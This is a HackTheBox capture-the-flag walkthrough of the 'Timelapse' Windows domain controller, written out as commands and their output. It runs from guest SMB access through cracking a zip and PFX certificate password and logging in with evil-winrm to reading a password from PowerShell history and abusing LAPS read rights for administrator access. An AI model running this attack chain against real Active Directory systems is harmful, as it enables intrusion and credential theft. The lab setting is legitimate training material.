HackTheBox - Timelapse Walkthrough
Introduction
OS: Windows
Difficulty: Easy
Points: 20
Release: 26 Mar 2022
IP: 10.10.11.152
Timelapse was an easy machine from HackTheBox. We need some basic enumeration and crack and extract the cert from pfx file to get the user flag.
Enumeration
nmap scanning result
# Nmap 7.92 scan initiated Sun Mar 27 07:29:04 2022 as: nmap -sC -sV -vvv -oN scan.nmap 10.10.11.152
Nmap scan report for 10.10.11.152
Host is up, received echo-reply ttl 127 (0.100s latency).
Scanned at 2022-03-27 07:29:05 UTC for 67s
Not shown: 989 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack ttl 127 Simple DNS Plus
88/tcp open kerberos-sec syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2022-03-27 15:29:18Z)
135/tcp open msrpc syn-ack ttl 127 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 127
464/tcp open kpasswd5? syn-ack ttl 127
593/tcp open ncacn_http syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp open ldapssl? syn-ack ttl 127
3268/tcp open ldap syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
3269/tcp open globalcatLDAPssl? syn-ack ttl 127
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 20407/tcp): CLEAN (Timeout)
| Check 2 (port 32357/tcp): CLEAN (Timeout)
| Check 3 (port 44242/udp): CLEAN (Timeout)
| Check 4 (port 22941/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: 7h59m58s
| smb2-time:
| date: 2022-03-27T15:29:29
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Mar 27 07:30:12 2022 -- 1 IP address (1 host up) scanned in 68.08 seconds
Foothold
I try some basic attack on the smb like null session injection and it worked and i have access to the shares. There is two directory in shares
#smbclient -L //10.10.11.152/
Enter WORKGROUP\GUEST's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Shares Disk
SYSVOL Disk Logon server share
SMB1 disabled -- no workgroup available
Then i Downloaded all files in the smb shares.
#smbclient //10.10.11.152/shares
Enter WORKGROUP\GUEST's password:
Try "help" to get a list of possible commands.
smb: \> ls Dev/
. D 0 Mon Oct 25 19:40:06 2021
.. D 0 Mon Oct 25 19:40:06 2021
winrm_backup.zip A 2611 Mon Oct 25 15:46:42 2021
6367231 blocks of size 4096. 1537388 blocks available
smb: \> ls HelpDesk\
. D 0 Mon Oct 25 15:48:42 2021
.. D 0 Mon Oct 25 15:48:42 2021
LAPS.x64.msi A 1118208 Mon Oct 25 14:57:50 2021
LAPS_Datasheet.docx A 104422 Mon Oct 25 14:57:46 2021
LAPS_OperationsGuide.docx A 641378 Mon Oct 25 14:57:40 2021
LAPS_TechnicalSpecification.docx A 72683 Mon Oct 25 14:57:44 2021
6367231 blocks of size 4096. 1537388 blocks available
I read all the documents.
after that i try to decompress the winrm_backup.zip file.
#unzip winrm_backup.zip
Archive: winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password:
skipping: legacyy_dev_auth.pfx incorrect password
then crack the zip file.
#fcrackzip -D -p ../rockyou.txt -u winrm_backup.zip
found file 'legacyy_dev_auth.pfx', (size cp/uc 2405/ 2555, flags 9, chk 72aa)
PASSWORD FOUND!!!!: pw == supremelegacy
User Flag
zip file name is winrm_backup.zip
i must to used to authenticate in winrm then i did a quick google search on what i can do with the pfx file i found some here https://www.ibm.com/docs/en/arl/9.7?topic=certification-extracting-certificate-keys-from-pfx-file
#openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out login.key
Enter Import Password:
Can't read Password
so we need to crack certificate password
i used crackpkcs12
#crackpkcs12 -d ../rockyou.txt legacyy_dev_auth.pfx
Dictionary attack - Starting 4 threads
*********************************************************
Dictionary attack - Thread 3 - Password found: thuglegacy
*********************************************************
Extract the private and public key
#openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out login.key
Enter Import Password:
Enter PEM pass phrase:
Verifying - Enter PEM pass phrase:
#openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out cert.crt
Enter Import Password:
Login with evil-winrm
#evil-winrm -S -k login.key -c cert.crt -i 10.10.11.152
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: SSL enabled
Info: Establishing connection to remote endpoint
Enter PEM pass phrase:
*Evil-WinRM* PS C:\Users\legacyy\Documents>
Get the user flag
*Evil-WinRM* PS C:\Users\legacyy\Documents> cd ..
*Evil-WinRM* PS C:\Users\legacyy> tree /f
Folder PATH listing
Volume serial number is 22CC-AE66
C:.
____Desktop
_ user.txt
_
____Documents
____Downloads
____Favorites
____Links
____Music
____Pictures
____Saved Games
____Videos
*Evil-WinRM* PS C:\Users\legacyy> cat Desktop/user.txt
56146e0ef****************
Priv Esc
user svc_deploy is in group LAPS_Readers
*Evil-WinRM* PS C:\Users> ls
Directory: C:\Users
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 10/23/2021 11:27 AM Administrator
d----- 10/25/2021 8:22 AM legacyy
d-r--- 10/23/2021 11:27 AM Public
d----- 10/25/2021 12:23 PM svc_deploy
d----- 2/23/2022 5:45 PM TRX
*Evil-WinRM* PS C:\Users> net user svc_deploy
Enter PEM pass phrase:
User name svc_deploy
Full Name svc_deploy
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 10/25/2021 12:12:37 PM
Password expires Never
Password changeable 10/26/2021 12:12:37 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 10/25/2021 12:25:53 PM
Logon hours allowed All
Local Group Memberships *Remote Management Use
Global Group memberships *LAPS_Readers *Domain Users
The command completed successfully.
then i looked on the powersell history file. I got the svc_deploy password
*Evil-WinRM* PS C:\Users> cat $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'REDACTED' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -
SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit
I login with user svc_deploy
#evil-winrm -S -u "svc_deploy" -p 'REDACTED' -i 10.10.11.152
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: SSL enabled
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc_deploy\Documents>
Root flag
the document say you can view the local administrator password with this command
Let import the Powershell Module AdmPwd.PS
git clone https://github.com/ztrhgf/LAPS.git
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> upload /root/ctf/htb/timelapse/LAPS/AdmPwd.PS
Warning: Remember that in docker environment all local paths should be at /data and it must be mapped correctly as a volume on docker run command
Info: Uploading /root/ctf/htb/timelapse/LAPS/AdmPwd.PS to C:\Users\svc_deploy\Documents\AdmPwd.PS
Data: 53980 bytes of 53980 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> Import-module ./AdmPwd.PS
So refer to the document we need the Computer name to get password
You can also get the password using PowerShell.
Get-AdmPwdPassword -ComputerName
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> $env:computername
DC01
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> Get-AdmPwdPassword -ComputerName DC01 | Format-table -autosize
ComputerName DistinguishedName Password ExpirationTimestamp
------------ ----------------- -------- -------------------
DC01 CN=DC01,OU=Domain Controllers,DC=timelapse,DC=htb REDACTED 4/6/2022 9:46:40 AM
Login to administrator
#evil-winrm -S -u "administrator" -p 'REDACTED' -i 10.10.11.152
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: SSL enabled
Info: Establishing connection to remote endpoint
finding the root flag
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd /users
*Evil-WinRM* PS C:\users> tree /f
Folder PATH listing
Volume serial number is 22CC-AE66
____TRX
____3D Objects
____Contacts
____Desktop
_ root.txt
get the root flag
*Evil-WinRM* PS C:\users> cat TRX/Desktop/root.txt
9e605da46bc349*****************